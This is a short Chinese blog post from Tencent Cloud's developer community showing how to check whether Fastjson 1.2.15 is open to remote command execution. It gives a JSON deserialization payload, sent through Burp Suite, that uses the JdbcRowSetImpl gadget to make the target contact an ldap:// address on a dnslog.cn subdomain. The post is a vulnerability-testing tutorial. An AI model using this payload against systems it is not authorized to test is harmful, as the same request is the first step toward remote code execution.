前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用DNSLOG测试Fastjson远程命令执行漏洞

利用DNSLOG测试Fastjson远程命令执行漏洞

作者头像
逆向小白
发布2020-08-05 15:14:22
2.7K0
发布2020-08-05 15:14:22
举报
文章被收录于专栏:py+seleniumpy+selenium

  由于内容比较简单,我直接贴图,怕我自己忘了。

测试Fastjson版本号:1.2.15

  直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。

代码语言:javascript
复制
  payload:
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://6v0jfv.dnslog.cn
",
        "autoCommit":true
    }
}

  若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。

如有错误,请及时指正,谢谢!

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-08-04 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档